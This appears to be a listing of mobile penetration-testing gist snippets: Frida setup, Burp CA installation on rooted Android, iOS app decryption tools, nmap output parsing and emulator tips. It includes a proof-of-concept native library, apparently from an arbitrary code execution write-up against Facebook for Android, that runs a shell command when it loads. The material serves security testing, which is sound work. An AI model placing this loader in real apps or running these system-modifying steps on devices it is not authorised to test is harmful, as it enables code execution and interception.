interference-security

#!/usr/bin/env bash

# Error codes + association:
# 1 - Running as root
# 2 - Unsupported platform
# 3 - Dependency issue
# 4 - Unsupported shell
# 5 - Setting $THEOS failed
# 6 - Theos clone failed
# 7 - Toolchain install failed

interference-security

frida-tools-termux

Source: https://github.com/middle1/frida-tools-termux/blob/main/README.md

Installation Steps

1. Update the packages on your device:

   pkg update -y && pkg upgrade -y

interference-security

#!/bin/bash
# Copyright 2021 Evan Custodio (@defparam)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), 
# to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, 
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,

interference-security

openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
mv cacert.pem <hash>.0  
adb push <hash>.0 /sdcard/Download/
adb shell
su
mkdir -m 700 /sdcard/cert/
cp /system/etc/security/cacerts/* /sdcard/cert/
mount -t tmpfs tmpfs /system/etc/security/cacerts

interference-security

Source: https://web.archive.org/web/20210626015800/https://defparam.medium.com/ios-app-testing-through-burp-on-corellium-fe59ed849516

wget https://github.com/JohnCoates/flexdecrypt/releases/download/1.1/flexdecrypt.deb
dpkg -i flexdecrypt.deb
rm flexdecrypt.deb
wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin
chmod +x /usr/local/bin/flexdump
flexdump --help

interference-security

mount -o rw,remount /vendor

copy /sdcard/Download/frida-server /vendor/bin/

chmod 700 /vendor/bin/frida-server

setprop ctl.start fridaserver

interference-security

//Source: https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f
#include <jni.h>
#include <string>
#include <stdlib.h>
JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved)
{
    system("id > /sdcard/PoC");
    return JNI_VERSION_1_6;
}

interference-security

iDevice:~ root#ldid -e `which bash` > ent.xml

iDevice:~ root# cat ent.xml

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>platform-application</key>
        <true/>
 com.apple.private.security.no-container

interference-security

Nmap output open ports separated by comma:

cat filename.nmap | grep -i "/tcp" | cut -d "/" -f1 | sort | uniq | tr '\n' ',' ; echo ""

Nmap open ports:

Linux: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort -u -n | tr "\n" "," | sed 's/,$//'

Windows: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort2 -u -n | tr -s "\r\n" "," | sed "s/,$//"

Powershell: Select-String -Path .\filename.nmap -Pattern ".*/tcp.*open.*" | Select-Object -ExpandProperty Line | %{$_.Split('/')[0]} | Sort-Object -Unique | %{$_.replace("`r","a")}

interference-security

Source: https://www.linkedin.com/pulse/android-emulator-tips-security-testers-divya-mudgal/

List created Android AVDs:

emulator -list-avds

Start an AVD (without Play Store) with writable "/system":

emulator -avd Pixel_3_XL_API_26 -writable-system

Start ADB daemon as root: